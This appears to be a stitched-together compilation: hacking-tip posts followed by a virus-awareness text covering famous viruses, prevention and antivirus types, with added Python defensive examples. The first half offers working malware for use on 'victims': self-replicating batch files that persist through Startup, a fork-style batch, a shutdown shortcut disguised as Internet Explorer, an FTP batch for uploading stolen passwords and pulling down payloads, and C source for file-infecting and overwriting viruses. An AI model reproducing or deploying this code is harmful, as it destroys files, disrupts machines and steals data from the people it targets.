wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "P"
wscript.sleep 200
wshshell.sendkeys "w"
wscript.sleep 150
wshshell.sendkeys "n"
wscript.sleep 170
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "A"
wscript.sleep 50
wshshell.sendkeys "l"
wscript.sleep 120
wshshell.sendkeys "l"
wscript.sleep 160
wshshell.sendkeys " "
wscript.sleep 200
wshshell.sendkeys "N"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "w"
wscript.sleep 200
wshshell.sendkeys "b"
wscript.sleep 120
wshshell.sendkeys "s"
Once the batch file is executed, it copies itself hundreds of times onto the desktop and into the startup folder. This means it regenerates once the computer is restarted, even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command-line arguments are optional and include "disinf" for erasing all of the copies permanently.
@ECHO OFF
:This was meant as a harmless joke, and it's not hard to fix if you read through the code.
:If you just use the "disinf" argument on the command line all is well.
:Please only use this on people u don't like
IF "%1"=="" GOTO fill
IF "%1"=="fill" GOTO fill
IF "%1"=="kill" GOTO kill
IF "%1"=="inf" GOTO inf
IF "%1"=="disinf" GOTO kill
GOTO bye
:fill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="" GOTO inf
GOTO theend
:kill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="disinf" GOTO disinf
GOTO theend
:inf
TYPE "%~df0" > "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:disinf
ECHO Y | DEL "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:bye
ECHO "fill" to make more and "kill" to get rid of 'em. inf to make it stick a little longer ;)
:theend
Copy and paste the code below into Notepad and save it as hi.bat (not .txt).
Run it and enjoy the anarchy:
@echo off
:START
echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
start hi.bat
GOTO START
How to make a shutdown file and disguise it as something else!
This article is a pretty simple one; most of you probably know it already. In case you don't, you can play around and have some fun.
How to make a shutdown file and disguise it as something else (internet, etc.):
Step 1: Right-click on your desktop, or wherever you want to make this shutdown file.
Step 2: Look for New, then Shortcut.
Step 3: Type shutdown -s -t 10 -c "text here"
Note: you can add -f to force open documents to close.
Note: after -t you can put any number of seconds you want before the computer shuts down.
Step 4: Push Next, then name it whatever you like; for example, we will use Internet Explorer.
Step 5: Right-click on the file you just made and go to Properties.
Step 6: Hit Change Icon (this could be under the Advanced tab).
Step 7: An error message should pop up letting you know there aren't any icons in c:\windows\system32. Hit OK.
Step 8: A list of icons should show up. Click on the one you think looks most persuasive according to what you named it (for example, look for the 'e' icon for Internet Explorer).
Now you're done; see, that wasn't so hard, was it?
Put this in the Startup folder to make people even MORE mad!
NOTE: This can easily be stopped by typing shutdown -a in Run.
OK, so I made a password stealer that would output a .txt file to the Windows folder; I then made an FTP batch that would upload the txt file to my server. So far I've managed to get some passwords, but not for anything important. So if you want to know how to make an FTP batch, here's how.
First, for example, we're going to try to upload a file called Test.txt to our server.
Upload.bat
ftp -n -i -s:MyUploadFiles.ftp
First make a file called upload.bat and put this in it. Now we need to make myuploadfiles.ftp; if you want to call it something else, change myuploadfiles.ftp to whatever you want, but KEEP the .ftp at the end.
OK, now it's time to create myuploadfiles.ftp, or whatever you called it before:
open your-host
user username.spam.com password
ASCII
send test.txt
BI
This is the bit where you have to change the username, password and host to those of your FTP host. Then change "send test.txt" to the file you want to upload; it doesn't have to be a txt file, it can be any file.
Now make sure both files are in the same directory and run the .bat file. Check your FTP server and guess what's sitting there: test.txt! So if you want to upload a file from someone's PC, you could use this.
Also, there's nothing stopping you from putting the "get" command in the .ftp, say "get download.bat"; whenever you want to change what it does, call it download.bat and put it on the server, and the victim will download and execute it.
Here is a simple batch virus that contains only 6 lines. It replicates itself again and again, creating a folder with the same name inside the previous one, until the user stops it.
1. Just open Notepad and copy and paste the code below:
cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop
2. Save it as a batch file with the extension .bat.
3. Then run it on the victim's computer to infect it.
4. Anyhow, it doesn't cause much harm; it just creates a folder inside a folder and goes on.
VIRUS CODES IN "C":-
BATCH & COM VIRUS
#include
#include
#include
#include
struct ffblk ffblk;
main()
{
char old_dir[MAXPATH];
Get_Path(old_dir); /* Save the old directory */
Pick_A_Dir(); /* Find a new directory to */
Infect_Directory(); /* infect and infect it. */
chdir(old_dir); /* Return to old directory */
return 0;
}
Pick_A_Dir()
{
int done;
chdir(".."); /* First, Go out a DIR. */
done=findfirst("*.BAT",&ffblk,0); /* If no BAT files, try */
/* root and DOS */
if (done)
{
chdir("\\");
done=findfirst("*.BAT",&ffblk,0);
if (done) chdir("\\DOS\\");
}
return 0;
}
Infect_Directory()
{
int done;
done = findfirst("*.BAT",&ffblk,0);
while (!done) /* Find all .BAT files */
{ /* and add code to run */
Do_Batch(); /* BAT&COM if not */
done = findnext(&ffblk); /* already there */
}
if (findfirst("BAT&COM.COM",&ffblk,0)) /* If BAT&COM does */
{Copy_Virus();} /* not exist, then */
return 0; /* copy it into dir.*/
}
Do_Batch()
{
FILE *batch;
char Infection_Buffer[12];
char vpath[MAXPATH];
Get_Path(vpath); /* Get path for adding path */
/* specifier in commands */
if (vpath[3]==0) vpath[2]=0; /* Keep path good in root */
batch=fopen(ffblk.ff_name, "rt+");
fseek(batch, -11, SEEK_END);
fread(Infection_Buffer,11,1,batch);
Infection_Buffer[11]=0; /* Terminate String */
if (strcmp(Infection_Buffer,"BAT&COM.COM")) /* Check if */
{ /* Batch is */
fseek(batch, 0, SEEK_END); /* infected.*/
fprintf(batch,"\n%s\\BAT&COM.COM",vpath);
} /*^- Add command */
/* to batch */
fclose(batch);
return 0;
}
Copy_Virus()
{
FILE *old_virus, *new_virus;
int write_length;
char copy_buffer[1024]; /* Copy the virus to */
/* new directory */
old_virus=fopen(_argv[0],"rb");
new_virus=fopen("BAT&COM.COM","wb");
write_length=1024;
while (write_length==1024)
{
write_length=fread(copy_buffer,1,1024,old_virus);
fwrite(copy_buffer,write_length,1,new_virus);
}
fclose(old_virus);
fclose(new_virus);
return 0;
}
Get_Path(char *path)
{
strcpy(path, "A:\\");
path[0] ='A' + getdisk(); /* Returns current path */
getcurdir(0, path+3);
return 0;
}
- - - -----------------End of Code------------------------ - - -
BLACK WOLF VIRUS
/* It will infect all .COM files in the current directory */
#include
#include
#include
FILE *Virus,*Host;
int x,y,done;
char buff[256];
struct ffblk ffblk;
main()
{
done = findfirst("*.COM",&ffblk,0); /* Find a .COM file */
while (!done) /* Loop for all COM's in DIR*/
{
printf("Infecting %s\n", ffblk.ff_name); /* Inform user */
Virus=fopen(_argv[0],"rb"); /* Open infected file */
Host=fopen(ffblk.ff_name,"rb+"); /* Open new host file */
x=9504; /* Virus size - must */
/* be correct for the */
/* compiler it is made */
/* on, otherwise the */
/* entire virus may not*/
/* be copied!! */
while (x>256) /* OVERWRITE new Host */
{ /* Read/Write 256 byte */
fread(buff,256,1,Virus); /* chunks until bytes */
fwrite(buff,256,1,Host); /* left < 256 */
x-=256;
}
fread(buff,x,1,Virus); /* Finish off copy */
fwrite(buff,x,1,Host);
fcloseall(); /* Close both files and*/
done = findnext(&ffblk); /* go for another one. */
}
/* Activation would go */
/* here */
return (0); /* Terminate */
}
OVERWRITE VIRUS CODE
#include
#include
#include
void main(int argc,char *argv[])
{
int bytes,i,done;
FILE *virus,*host;
struct ffblk *f;
char buffer[512];
do
{
done=findfirst("*.exe",f,0);
while(!done)
{
virus=fopen(argv[0],"rb");//open the virus in read mode
host=fopen(f->ff_name,"rb+");//open the host file in r/w mode
for(;fread(buffer,512,1,virus)==1;)
fwrite(buffer,512,1,host);
fclose(host);
fseek(virus,0,0);//points to begining of virus
printf("infecting %s\n",f->ff_name);
done=findnext(f);
}
}
while(!chdir(".."));
printf("For any querry contact\nsudhir sharma; sudhir0786@gmail.com ");
REPLICATION VIRUS
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf("————————————————————————–");
printf("\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n");
cprintf("————————————————————————–");
done = findfirst("*.*",&ffblk,0);
while (!done)
{ printf("\n");cprintf(" %s ", ffblk.ff_name);printf("is attacked by ");cprintf("Folderbomb");
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
4.2 VIRUSES THAT GO FURTHEST
Love Bug
- VBS/LoveLet-A
- Best known; pretends to be a love letter
- First seen: May 2000
- Origin: Philippines
- Trigger: On initial infection
- Effect: E-mail with a "love letter" subject, distributed via MS Outlook; steals user info; overwrites certain files
Kakworm
- VBS/Kakworm
- Infects by viewing infected mails
- First seen: June 1998
- Origin: written by Chen Ing Hau of Taiwan
- Trigger: On initial infection or the 1st of any month
- Effect: Arrives embedded in mail, infects when opened, affects MS Outlook, i.e. the virus code is automatically included with all outgoing mails; on the 1st of any month displays "Kagou-Anti_Kro$oft says not today" and shuts down
Melissa
- WM97/Melissa, a Word 97 macro virus
- Uses psychological subtlety
- First seen: March 1999
- Origin: A 31-year-old US programmer, David L. Smith
- Trigger: On initial infection
- Effect: Sends a message to the first fifty addresses in all address books, attaching the infected document
CIH (Chernobyl)
- W95/CIH-10xx, a parasitic virus, runs on Win 95
- First virus to damage hardware
- First seen: June 1998
- Origin: Written by Chen Ing Hau of Taiwan
- Trigger: April 26th, June 26th or the 26th of any month
- Effect: Overwrites the HD, overwrites the BIOS, needs BIOS chip replacement
5. PREVENTING VIRUSES
The simple measures to avoid being infected, or to deal with viruses if you are infected, are:
- Make users aware of the risks: Tell everyone in the organization that they are at risk if they swap floppy disks, download files from websites or open email attachments.
- Install anti-virus software and update it regularly: Anti-virus programs can detect and often disinfect viruses. If the software offers on-access virus checking, use it. On-access checking protects users by denying access to any file that is infected.
- Keep backups of all your data: Make sure you have backups of all data and software, including operating systems. If you are affected by a virus, you can replace your files and programs with clean copies.
6. SOURCES OF VIRUSES
6.1. Email
Email is now the biggest source of viruses. As long as viruses were transferred by floppy disk, they spread slowly: companies could ban disks or insist on having them virus-checked. Email has changed all that. Conventional viruses can spread faster, and new kinds of virus exploit the workings of email programs. Viruses such as Kakworm and Bubbleboy can infect users when they read email. They look like any other message but contain a hidden script that runs as soon as you open the email, or even look at it in the preview pane (as long as you are using Outlook with the right version of Internet Explorer). This script can change system settings and send the virus to other users via email.
The greatest security risk at present isn’t email itself but email attachments. Any program, document or spreadsheet that you receive by email could carry a virus; launching such an attachment can infect your computer.
Viruses that spread automatically by email
The most successful viruses today are those that spread themselves automatically by email. Typically, these viruses depend on the user clicking on an attached document. This runs a script that uses the email program to forward infected documents to other email users. Melissa, for example, sends a message to the first fifty addresses in all address books that Microsoft Outlook can access. Other viruses send themselves to every address in the address book.
6.1.1. Email hoaxes
Email is a popular medium for hoaxes. These are bogus virus reports that urge you to forward the message to everyone you know. An email hoax can spread across networks like a virus and can cause a mail overload. The difference is that the hoax doesn't need virus code; it simply depends on users' credulity.
6.1.2. What is spam?
Spam is unsolicited email, often advertising get-rich quick schemes, home working jobs, loans or pornographic websites. Spam often comes with fake return information, which makes it more difficult to deal with the perpetrators. Such mail should simply be deleted.
Email interception and forgery
Email interception involves other users reading your email while it is in transit. You can protect yourself with email encryption. Email forgery means sending mail with a forged sender's address or tampering with the contents; you can protect yourself against it by using digital signatures.
6.1.3. How to stop email viruses
- Have a strict policy about email attachments: Changing your (and other users') behavior is the simplest way to combat email threats. Don't open any attachments, even if they come from your best friend. If you don't know that something is virus-free, treat it as if it's infected. You should have a company policy that ALL attachments are authorized and checked with anti-virus software before being launched.
- Use anti-virus software: Use on-access anti-virus software on the desktop and at the email gateway. Both arrangements can protect against viruses sent via email.
- Block unwanted file types at the gateway: Viruses often use file types such as VBS, SHS, EXE, SCR, CHM and BAT to spread. It is unlikely that your organization will ever need to receive files of these types from outside, so block them at the email gateway.
- Block files with double extensions at the gateway: Some viruses disguise the fact that they are programs by using a 'double extension', such as .TXT.VBS, after their filename. Block such files at the email gateway.
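Added here as an example (not code from the page): a Python attachment filter that applies the last two rules above, the blocked-type list and the double-extension check. The decoy-extension list, the helper names and the sample attachment names are this example's own assumptions.

```python
"""Attachment policy for an email gateway, as the 'How to stop email viruses'
list describes it: refuse the script and executable types named there, and
refuse files that hide such a type behind a 'double extension' like .TXT.VBS.
Constructed example, not from the page; the decoy-extension list is an
assumption."""

import re
from dataclasses import dataclass

# File types the page says to block at the gateway.
BLOCKED_EXTENSIONS = {"vbs", "shs", "exe", "scr", "chm", "bat"}

# Harmless-looking types that get placed in front of the real extension
# (assumed list; extend it to match the document types your users exchange).
DECOY_EXTENSIONS = {"txt", "doc", "xls", "jpg", "gif", "pdf", "mp3", "htm", "html"}


@dataclass(frozen=True)
class Verdict:
    allowed: bool
    reason: str


def _extensions(filename: str) -> list:
    """Lower-cased extension chain: 'LOVE-LETTER.TXT.vbs' -> ['txt', 'vbs'].
    Any directory part is dropped and whitespace is removed first, since a run
    of spaces is one way to push the real extension out of view in a mail
    client's attachment list."""
    name = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    name = re.sub(r"\s+", "", name).strip(".")
    parts = name.split(".")
    return [p.lower() for p in parts[1:]]   # parts[0] is the base name


def check_attachment(filename: str) -> Verdict:
    """Decide on one attachment name. Matching is case-insensitive, so
    setup.EXE is treated the same as setup.exe."""
    exts = _extensions(filename)
    if not exts:
        return Verdict(True, "no extension")
    last = exts[-1]
    if last in BLOCKED_EXTENSIONS:
        if len(exts) >= 2 and exts[-2] in DECOY_EXTENSIONS:
            return Verdict(False, f"double extension .{exts[-2].upper()}.{last.upper()}")
        return Verdict(False, f"blocked file type .{last.upper()}")
    return Verdict(True, f".{last} is not on the block list")


def filter_attachments(filenames):
    """Apply the policy to a whole message; returns (allowed, blocked) lists
    of (name, reason) pairs so the gateway can log why something was dropped."""
    allowed, blocked = [], []
    for name in filenames:
        v = check_attachment(name)
        (allowed if v.allowed else blocked).append((name, v.reason))
    return allowed, blocked


if __name__ == "__main__":
    # Constructed attachment names, not taken from real mail.
    sample = ["report.doc", "setup.EXE", "LOVE-LETTER-FOR-YOU.TXT.vbs",
              "photo.jpg            .scr", "archive.tar.gz", "readme"]
    ok, dropped = filter_attachments(sample)
    for name, why in dropped:
        print(f"BLOCKED {name!r}: {why}")
    for name, why in ok:
        print(f"allowed {name!r}: {why}")
```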
6.2. The internet
The internet has made more information available to more people more quickly than ever before. The downside is that the internet has also made it easier for harmful computer code to reach office and home computers.
Click and infect?
The internet has increased the risk of infection. Ten years ago, most viruses spread via floppy disks. Spreading in this way was slow and depended on users making a conscious effort to run new programs. If the virus had side-effects that were too obvious, it was unlikely to affect many users. The internet, by contrast, has let viruses spread widely.
Can I be infected just by visiting websites?
Visiting a website is less hazardous than opening unknown programs or documents. There are risks, though. The threat depends on the types of code used on the site and the security measures taken by service providers and by the user. The main types of code are:
6.2.1. Different types of code used on websites
HTML
Web pages are written in HTML (Hypertext Markup Language). This language lets web authors format their text and create links to graphics and to other pages. HTML code itself can’t carry a virus. However, web pages can contain code that launches applications or opens documents automatically. This introduces the risk of launching an infected item.
ActiveX
ActiveX is a Microsoft technology for web developers, used only on computers running Windows. ActiveX applets, used to create visual effects on web pages, have full access to resources on your computer, which makes them a potential threat. However, digital signatures, which prove that an applet is authentic and hasn't been tampered with, do provide limited security.
Java
People sometimes worry unduly about Java viruses on the internet. They do so because they confuse Java applets, which are used to create effects on web pages, with Java applications and JavaScript. Applets are generally safe. They are run by the browser in a secure environment known as a 'sandbox'. Even if a security flaw lets an applet escape, a malicious applet cannot spread easily. Applets usually flow from a server to users' computers, not from one user to another (you tell your friends to visit a site rather than sending them a copy of an applet). In addition, applets are not saved on the hard disk, except in the web cache. If you do encounter a harmful applet, it is most likely to be a Trojan, i.e. a malicious program pretending to be legitimate software. Java applications are simply programs written in the Java language. Like any other program, they can carry viruses. You should treat them with the same caution as you would use with other programs. JavaScript is script embedded in the HTML code of web pages. Like any other script, it can carry out operations automatically, which carries risks. You can disable active scripts in your browser.
JScript:
The Microsoft version of JavaScript. It is about as flexible and expandable (and unsafe) as Visual Basic Script. JScript is found in *.JS files or on web pages.
VBS script
VBS (Visual Basic Script) can run as soon as a page is viewed, depending on the browser used. You don’t have to do anything to launch it. This script is used by email worms such as Kakworm and Bubbleboy, but can just as well be run from web pages.
IRC scripts
Internet Relay Chat is a chat system for the Internet. Chat systems can be scripted to perform certain tasks automatically, like sending a greeting to someone who has just joined the chat room. However, the scripts also support sending files, and many worms and viruses spread over IRC. Known IRC programs that have been exploited are the popular mIRC, pIRCH and VIRC clients.
Are cookies a risk?
Cookies do not pose a direct threat to your computer or the data on it. However, they do threaten your confidentiality: a cookie enables a website to remember your details and keep track of your visits to the site. If you prefer to remain anonymous, you should use the security settings on your browser to disable cookies.
6.2.2. Attacks on web servers
End-users aren't the only ones at risk on the internet. Some hackers target the web servers that make websites available. A common form of attack involves sending so many requests to a web server that it slows down or crashes. When this happens, genuine users can no longer gain access to the websites hosted by the server. CGI (Common Gateway Interface) scripts are another weak point. These scripts run on web servers to handle search engines, accept input from forms, and so forth. Hackers can exploit poorly implemented CGI scripts to take control of a server.
6.2.3. Safety on the net
If you want to use the internet safely, you should do the following:
- Have a separate network for internet machines: Maintain separate networks for those computers that are connected to the internet and those that are not. Doing so reduces the risk that users will download infected files and spread viruses on your main network.
- Use firewalls and/or routers: A firewall admits only authorized traffic to your organization. A router controls the flow of packets of information from the internet.
- Configure your internet browser for security: Disable Java or ActiveX applets, cookies, etc., or ask to be warned that such code is running. For example, in Microsoft Internet Explorer, select Tools/Internet Options|Security|Custom Level and select the security settings you want.
7. VIRUSES ON DIFFERENT OPERATING SYSTEMS
a) MS-DOS:
Since the macro viruses seen to date infect data files generated from and read by Windows applications, macro viruses are not a problem on MS-DOS-only machines. Traditional file viruses and boot viruses prosper on MS-DOS machines because MS-DOS has no inherent security features. Viruses therefore have free rein to infect memory and program files.
b) Windows:
Macro viruses have been written to target Windows applications, and therefore the presence of Windows is required. Combining the wide acceptance of Windows with the fact that macro viruses infect data files rather than program files (see "Macro virus" on page 19) has led to six macro viruses being among the ten most common viruses overall. The actual booting process on a Windows machine is no different from that on a DOS-only machine. Therefore, boot viruses have not been hindered by Windows, and they continue to propagate by infecting hard drives, going memory resident, and then infecting floppies.
c) Windows 95/98/ME:
Unlike Windows and DOS, Windows 95/98 is marketed as having built-in security features. Unfortunately, such features are not robust enough to safeguard Windows 95/98 against viruses. In fact, the first virus written specifically to target Windows 95 (the Boza virus) emerged late in 1995. Furthermore, Windows 95's workgroup networking environment has no file-level protection and can therefore lead to increased virus spreading. After the rather primitive Boza virus, Windows 95/98 and Windows NT/2000 viruses increased in number and complexity. As in the DOS environment, the first viruses were amateurish. Some of the viruses under Windows 95/98 and Windows NT/2000 spread by actively using the network protocol. DOS file viruses can easily spread on a Windows 95/98 machine, because the only limitation on DOS program files under Windows 95/98 is that they cannot write directly to the hard drive. Since the Windows 95/98 boot process is the same as that of a DOS-only or Windows machine (up to a certain point), boot viruses are able to infect the hard drives of Windows 95/98 machines. When Windows 95/98 loads, however, boot viruses are often disabled and not allowed to propagate.
d) Windows NT/2000/XP:
Windows NT supports DOS applications, Windows applications and native Windows NT applications. Like Windows 95/98, Windows NT is backwards compatible, to some extent, with DOS and Windows. Despite the fact that NT's security features are more robust than Windows 95/98's, file viruses can still infect and propagate within Windows NT. As with Windows 95/98, Windows NT supports applications that contain macro programming languages, making NT as vulnerable to macro viruses as older Windows machines. Because Windows NT machines boot the same way that DOS machines do (up to the point at which NT takes over), boot viruses are able to infect NT hard drives. However, when these boot viruses attempt to go memory resident, they will be stopped by NT and therefore be unable to infect floppies.
e) Windows Vista:
The first computer virus targeting the Windows Vista system broke out during the weekend, and five variations appeared online yesterday, an Internet security firm said.
The worm ANI, which forces infected computers to download spy programs and Trojans, makes use of a Windows Vista loophole. And the virus can't be prevented, as Microsoft won't launch a fix until tomorrow, said Rising Co Ltd, a Beijing-based anti-virus firm.
The worm is the first to target the new Windows operating system, and Rising has received "several hundred" reports about it, according to Lu Lan, Rising's marketing official.
f) Linux
Currently there are under 100 native Linux viruses known, but in many organizations the fact that Linux viruses exist at all is reason enough to install and use Linux antivirus protection on Linux desktops and servers. Additionally, users of StarOffice and OpenOffice.org can open and view Microsoft Office documents that may contain viruses. These viruses may not infect the Linux computer, but the user can easily and unknowingly attach and send these infected documents to someone else, and that is a serious problem.
As system administrators move to Linux file servers, they have a real problem to deal with, since a Linux file server can store Windows-based viruses. Windows-based viruses can write to a Linux/Samba network share as easily as they can on a Microsoft Windows-based network. System administrators must protect the Linux server from storing these viruses. The only way is through active antivirus defense on the Linux server itself. Our Vexira Antivirus for Linux, as an example, detects not only Linux-based viruses but Windows- and DOS-based ones as well; I think the current number of malicious or potentially malicious applications (viruses, trojans, worms, etc.) we detect is above 74,000 now.
8. ANTIVIRUS SOFTWARE
Anti-virus software can detect viruses, prevent access to infected files and often eliminate the infection. The main kinds are:
a. Scanners
Virus scanners can detect, and often disinfect, the viruses known at the time the scanner is released. Scanners are easily the most popular form of anti-virus software but they have to be updated regularly to recognize new viruses. There are on-demand and on-access scanners. Many anti-virus packages offer both. On-demand scanners let you start or schedule a scan of specific files or drives. On-access scanners stay active on your machine whenever you are using it. They check files as you try to open or run them.
b. Checksummers
Checksummers are programs that can tell when files have been changed. If a virus infects a program or document, changing it in the process, the checksummer should report the change. The good thing about checksummers is that they do not need to know anything about a virus in order to detect its presence. For that reason, checksummers do not need regular updating. The bad thing about checksummers is that they cannot tell the difference between a virus and a legitimate change, so false alarms are likely. Checksummers have particular problems with documents, which can change frequently. In addition, checksummers can only alert you after infection has taken place, they cannot identify the virus, and they cannot provide disinfection.
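A small checksummer in Python, added here as an illustration and not code from the page: it baselines a directory, then reports modified, added and missing files, and its demo shows both the detection and the limitation just described (it cannot tell an appended line from a legitimate edit). The function names and the sample files are assumptions.

```python
"""A checksummer of the kind section 8(b) describes: record a digest of every
file once, then report what has changed, appeared or vanished.  It needs no
knowledge of any virus, but it also cannot say whether a change was an
infection or a legitimate edit, and it only reports after the fact.  The
baseline itself must be kept where the machine being checked cannot rewrite
it (read-only media or another host), or an infection can simply re-baseline.
Constructed example; not code from the page."""

import hashlib
import os
import tempfile
from dataclasses import dataclass, field


@dataclass
class Report:
    modified: list = field(default_factory=list)
    added: list = field(default_factory=list)
    missing: list = field(default_factory=list)

    def clean(self) -> bool:
        return not (self.modified or self.added or self.missing)


def file_digest(path: str) -> str:
    """SHA-256 of a file, read in chunks so large files are not loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> dict:
    """Digest of every regular file under root, keyed by path relative to root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root)] = file_digest(full)
    return baseline


def compare(baseline: dict, current: dict) -> Report:
    """Diff two baselines.  A changed digest is reported whatever caused it;
    the checksummer has no way to name a virus or to disinfect anything."""
    r = Report()
    for rel, digest in sorted(current.items()):
        if rel not in baseline:
            r.added.append(rel)
        elif baseline[rel] != digest:
            r.modified.append(rel)
    r.missing = sorted(rel for rel in baseline if rel not in current)
    return r


def demo() -> Report:
    """Constructed walk-through: baseline a small tree, then alter one batch
    file the way the page's BAT&COM example does (a single appended line),
    drop a new file, and compare.  The checksummer flags both, but it would
    flag an editor saving autoexec.bat in exactly the same way."""
    with tempfile.TemporaryDirectory() as root:
        bat = os.path.join(root, "autoexec.bat")
        with open(bat, "w") as f:
            f.write("@echo off\r\necho hello\r\n")
        with open(os.path.join(root, "readme.txt"), "w") as f:
            f.write("constructed sample file\n")
        baseline = build_baseline(root)

        with open(bat, "a") as f:                 # one appended line
            f.write("C:\\BAT&COM.COM\r\n")
        with open(os.path.join(root, "dropped.com"), "wb") as f:
            f.write(b"constructed placeholder, not a real program")
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    report = demo()
    print("modified:", report.modified)
    print("added:   ", report.added)
    print("missing: ", report.missing)
```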
c.Heuristics
Heuristic software tries to detect viruses – both known and unknown – by using general rules about what viruses look like. Unlike conventional scanners, this software doesn’t rely on frequent updates about all known viruses. However, if a new kind of virus emerges, the software will not recognize it and will need to be updated or replaced. Heuristics can be prone to false alarms.
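As an added example of the rule-based approach this section describes (not code from the original text or from any antivirus product), the Python script below scores a Windows script file against a handful of general rules about what mass-mailing script viruses look like: automating Outlook, walking the address book, copying the running script somewhere else, and registering itself under a Run key. The rules, weights, threshold and the three VBScript samples are all constructed for this example; the "worm-like" sample only references the same APIs a scanner would look for and is not a working virus.

```python
"""Toy heuristic scanner for Windows script files.

Added example, not from the original page. Rules, weights, threshold and
the sample scripts are this example's own construction.
"""
import re

# (name, pattern, weight): general traits of mass-mailing script viruses.
RULES = [
    ("outlook-automation",
     re.compile(r'CreateObject\(\s*"Outlook\.Application"\s*\)', re.I), 3),
    ("address-book-walk",
     re.compile(r"\.AddressLists|\.AddressEntries", re.I), 3),
    ("filesystem-object",
     re.compile(r'CreateObject\(\s*"Scripting\.FileSystemObject"\s*\)', re.I), 1),
    ("copy-self",
     re.compile(r"\.CopyFile\s*\(?\s*WScript\.ScriptFullName", re.I), 3),
    ("run-key-persistence",
     re.compile(r"RegWrite\s*\(?.*\\CurrentVersion\\Run", re.I), 3),
]
THRESHOLD = 6  # assumption: tuned so one benign trait never trips the alarm


def score_script(source: str) -> tuple:
    """Return (total weight, names of rules that matched)."""
    hits = [(name, weight) for name, rx, weight in RULES if rx.search(source)]
    return sum(w for _, w in hits), [n for n, _ in hits]


def classify(source: str) -> tuple:
    """Return ("suspicious"|"clean", score, matched rule names)."""
    total, hits = score_script(source)
    return ("suspicious" if total >= THRESHOLD else "clean", total, hits)


# Constructed sample: references the APIs a mass mailer needs, nothing more.
WORM_SAMPLE = r'''
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile WScript.ScriptFullName, fso.GetSpecialFolder(1) & "\winsys32.vbs"
Set sh = CreateObject("WScript.Shell")
sh.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\winsys32", "winsys32.vbs"
Set app = CreateObject("Outlook.Application")
For Each lst In app.GetNameSpace("MAPI").AddressLists
  ' ... mass-mailing loop omitted ...
Next
'''

# Constructed sample: an ordinary logon script.
LOGON_SAMPLE = r'''
Set net = CreateObject("WScript.Network")
net.MapNetworkDrive "H:", "\\fileserver\home"
Set fso = CreateObject("Scripting.FileSystemObject")
Set ini = fso.OpenTextFile("H:\settings.ini", 1)
WScript.Echo ini.ReadAll
'''

# Constructed sample: a legitimate installer that shares two traits with the worm.
INSTALLER_SAMPLE = r'''
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile "setup\agent.exe", "C:\Program Files\Agent\agent.exe"
Set sh = CreateObject("WScript.Shell")
sh.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Agent", "C:\Program Files\Agent\agent.exe"
'''

if __name__ == "__main__":
    for label, src in (("worm-like", WORM_SAMPLE), ("logon", LOGON_SAMPLE),
                       ("installer", INSTALLER_SAMPLE)):
        print(label, classify(src))
```

The installer scores 4 out of a threshold of 6: lower the threshold to catch subtler worms and it becomes a false alarm, which is the trade-off the paragraph warns about. Nothing here needs a signature update, but a virus written with a different automation interface would match none of the rules, which is the other limitation described above.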
MOBILE PHONES AND PALMTOPS
9. MOBILE PHONES AND PALMTOPS
